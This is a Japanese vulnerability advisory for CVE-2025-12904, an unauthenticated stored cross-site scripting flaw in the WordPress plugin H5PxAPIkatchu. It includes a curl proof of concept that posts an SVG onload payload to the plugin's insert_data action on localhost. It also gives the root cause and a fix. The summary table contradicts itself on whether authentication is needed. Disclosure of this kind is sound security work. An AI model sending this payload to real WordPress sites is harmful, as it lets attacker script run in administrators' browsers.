
CVE-2025-12904 の開示
CVE-2025-12904 の開示
このリポジトリは、otacke によって開発された WordPress プラグイン SNORDIAN's H5PxAPIkatchu <= 0.4.16 で発見された脆弱性を開示するものです。
| CVE ID | タイプ | コンポーネント | 影響 |
|---|---|---|---|
| CVE-2025-12904 | insert_data を介した未認証の格納型クロスサイトスクリプティング | class-table-view.php | 認証された攻撃者が JS を実行できる |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※object 内の id が存在しない場合、失敗します。
insert_data() 関数は権限チェックを一切行っておらず、認証なしで悪意のある入力を保存できてしまいました。さらに、これらのエントリは管理インターフェース上でエスケープされずに表示されていました。
insert_data() 関数で current_user_can を使用することで、不正な実行を防ぐことができます。echo $value ではなく esc_html($value) を使用することで、XSS の実行を防ぐことができます。PoCを作成するのがとても大変だった。
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
この部分の再現にとても時間を使ってしまった。curlコマンドをもっと使いこなせるようになりたい。 あとこのプラグイン...色々と大丈夫?とくに、名前とか、さ。
名前: MooseLove
役割: 独立系セキュリティ研究者 / バグハンター
連絡先: リクエストがあれば提供します
本アドバイザリは、一般のセキュリティ啓発を目的として提供されています。出典を明記の上、自由に共有してください。